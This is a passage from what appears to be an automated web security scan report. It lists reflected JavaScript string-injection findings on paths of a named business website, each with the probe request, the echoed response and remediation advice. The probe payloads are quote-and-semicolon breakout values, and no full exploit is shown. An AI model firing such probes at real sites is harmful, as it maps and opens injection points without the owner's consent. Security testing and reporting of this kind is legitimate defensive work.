Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:00 GMT
Content-Type: text/html
Content-Length: 43870
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/toolsf31e1";1ed10348e60/edibilling/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.1083. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2050c'%3b98f93bc5a06 was submitted in the REST URL parameter 4. This input was echoed as 2050c';98f93bc5a06 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/edibilling2050c'%3b98f93bc5a06/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:39 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 46518
Date: Wed, 17 Nov 2010 00:36:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/tools/edibilling2050c';98f93bc5a06/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1084. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2629a"%3bc8c9da229d0 was submitted in the REST URL parameter 4. This input was echoed as 2629a";c8c9da229d0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/edibilling2629a"%3bc8c9da229d0/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:14 GMT
Content-Type: text/html
Content-Length: 46520
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
bx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools/edibilling2629a";c8c9da229d0/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1085. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/expressInstall.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96cff'%3bf9f6c9819db was submitted in the REST URL parameter 1. This input was echoed as 96cff';f9f6c9819db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates96cff'%3bf9f6c9819db/expressInstall.swf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:13 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templates96cff';f9f6c9819db/expressInstall.swf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1086. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/expressInstall.swf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad629"%3ba8ccbdd56fc was submitted in the REST URL parameter 1. This input was echoed as ad629";a8ccbdd56fc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesad629"%3ba8ccbdd56fc/expressInstall.swf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:30:46 GMT
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:30:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:30:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templatesad629";a8ccbdd56fc/expressInstall.swf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.1087. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/expressInstall.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 370c9"%3b01455493364 was submitted in the REST URL parameter 2. This input was echoed as 370c9";01455493364 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/expressInstall.swf370c9"%3b01455493364 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:29 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40636
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:29 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/expressInstall.swf370c9";01455493364";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1088. http://www.verizonbusiness.com/templates/expressInstall.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/expressInstall.swf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81c5'%3bc0f85279f16 was submitted in the REST URL parameter 2. This input was echoed as d81c5';c0f85279f16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/expressInstall.swfd81c5'%3bc0f85279f16 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:31:57 GMT
Content-Type: text/html
Content-Length: 40638
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:31:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:31:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templates/expressInstall.swfd81c5';c0f85279f16'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1089. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/hbx.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c84e0"%3b40bfd7b64bf was submitted in the REST URL parameter 1. This input was echoed as c84e0";40bfd7b64bf in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesc84e0"%3b40bfd7b64bf/hbx.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:14 GMT
Vary: *
Content-Type: text/html
Content-Length: 40612
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templatesc84e0";40bfd7b64bf/hbx.js";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTIO
...[SNIP]...

1.1090. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/hbx.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19d19'%3bf7195436b29 was submitted in the REST URL parameter 1. This input was echoed as 19d19';f7195436b29 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates19d19'%3bf7195436b29/hbx.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:26 GMT
Vary: *
Content-Type: text/html
Content-Length: 40614
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/templates19d19';f7195436b29/hbx.js'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1091. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/hbx.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9a62'%3be6f32187f2c was submitted in the REST URL parameter 2. This input was echoed as d9a62';e6f32187f2c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/hbx.jsd9a62'%3be6f32187f2c HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:50 GMT
Vary: *
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40612
Date: Wed, 17 Nov 2010 00:03:50 GMT
Connection: close
Vary: Accept-Encoding
Expires: Mon, 16 Nov 2009 18:03:50 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templates/hbx.jsd9a62';e6f32187f2c'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1092. http://www.verizonbusiness.com/templates/hbx.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/hbx.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4223c"%3b08738572e10 was submitted in the REST URL parameter 2. This input was echoed as 4223c";08738572e10 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/hbx.js4223c"%3b08738572e10 HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:36 GMT
Vary: *
Content-Type: text/html
Content-Length: 40612
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates/hbx.js4223c";08738572e10";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.1093. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fbee"%3b959eabdf70 was submitted in the REST URL parameter 1. This input was echoed as 2fbee";959eabdf70 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates2fbee"%3b959eabdf70/js-+jquery/jquery+swfobject2+vzbar/site.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:19 GMT
Vary: *
Content-Type: text/html
Content-Length: 40682
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/templates2fbee";959eabdf70/js-+jquery/jquery+swfobject2+vzbar/site.js";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATIO
...[SNIP]...

1.1094. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d787f'%3bb866420fac6 was submitted in the REST URL parameter 1. This input was echoed as d787f';b866420fac6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templatesd787f'%3bb866420fac6/js-+jquery/jquery+swfobject2+vzbar/site.js HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Vary: *
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:29 GMT
Content-Type: text/html
Content-Length: 40684
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/templatesd787f';b866420fac6/js-+jquery/jquery+swfobject2+vzbar/site.js'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1095. http://www.verizonbusiness.com/templates/js-+jquery/jquery+swfobject2+vzbar/site.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /templates/js-+jquery/jquery+swfobject2+vzbar/site.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8515'%3b1e90016a7f0 was submitted in the REST URL parameter 2. This input was echoed as b8515';1e90016a7f0 in the application's response.

